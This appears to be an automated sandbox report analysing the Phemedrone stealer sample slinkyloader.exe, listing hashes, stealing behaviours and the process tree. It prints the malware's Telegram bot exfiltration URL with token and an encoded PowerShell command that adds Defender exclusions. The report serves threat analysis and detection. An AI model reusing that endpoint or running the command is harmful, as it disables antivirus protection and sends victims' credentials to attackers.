Analysis
-
max time kernel
143s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-02-2025 09:30
Static task
static1
Behavioral task
behavioral1
Sample
slinkyloader.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
slinkyloader.exe
Resource
win10v2004-20250217-en
General
-
Target
slinkyloader.exe
-
Size
18.5MB
-
MD5
16c3dea94d76e543f411d4c39c86fd2d
-
SHA1
c746d6096bbfcf6e5fe1ee1f052ce87ebe2bf0a6
-
SHA256
3d0136aa999263e36d344cdf9699be53a96872a6cc6a9426bb8fd40133366c3b
-
SHA512
71d7a55c7bcbdcea7c814981e470a73da9d32d88810b4792e6f2530e8ae453cc06c82587eb5bda70d52d75295d643e8d531bbddd29d838d720757053b1d54726
-
SSDEEP
393216:svmY2qQIpv7b01MkOYFld5xRwTOu3Uci7OkKprTWlKDtwOju3SLKyiYGLgN:TFUb0WtOlXxG6gUceOkW8KDt5j6QKIP
Malware Config
Extracted
phemedrone
https://api.telegram.org/bot6407909076:AAGyVRw-4LZlh90gO_hIHntE1PGp-GHKDII/sendMessage?chat_id=-1002357854454
Signatures
-
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Executes dropped EXE 1 IoCs
pid Process 2276 loader.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2752 powershell.exe 2276 loader.exe 2276 loader.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 2276 loader.exe Token: 33 2288 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2288 AUDIODG.EXE Token: 33 2288 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2288 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2696 wrote to memory of 2752 2696 slinkyloader.exe 30 PID 2696 wrote to memory of 2752 2696 slinkyloader.exe 30 PID 2696 wrote to memory of 2752 2696 slinkyloader.exe 30 PID 2696 wrote to memory of 2276 2696 slinkyloader.exe 32 PID 2696 wrote to memory of 2276 2696 slinkyloader.exe 32 PID 2696 wrote to memory of 2276 2696 slinkyloader.exe 32 PID 2696 wrote to memory of 1992 2696 slinkyloader.exe 33 PID 2696 wrote to memory of 1992 2696 slinkyloader.exe 33 PID 2696 wrote to memory of 1992 2696 slinkyloader.exe 33 PID 2276 wrote to memory of 2164 2276 loader.exe 35 PID 2276 wrote to memory of 2164 2276 loader.exe 35 PID 2276 wrote to memory of 2164 2276 loader.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAeAByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAdQBlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAeAB2ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2276 -s 8003⤵PID:2164
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2696 -s 9562⤵PID:1992
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2412
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x40c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2288
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
126KB
MD5f231475bacd302b879efb7a01e2637dc
SHA15f13d4e11fa84d35d7fef1ae517546b356609ec6
SHA2568f1e95d826c3e16ca5218cc7e44a608db4bdb42eff4a6fba6bd17709ef6ea800
SHA5126094a1505e50b657184fc675e1d078d537fa76d74371ee8a928871e5b9302502b06582057c300752858e8242ee26b1687a2980d0778e6226ab8acdbe5af1ab5e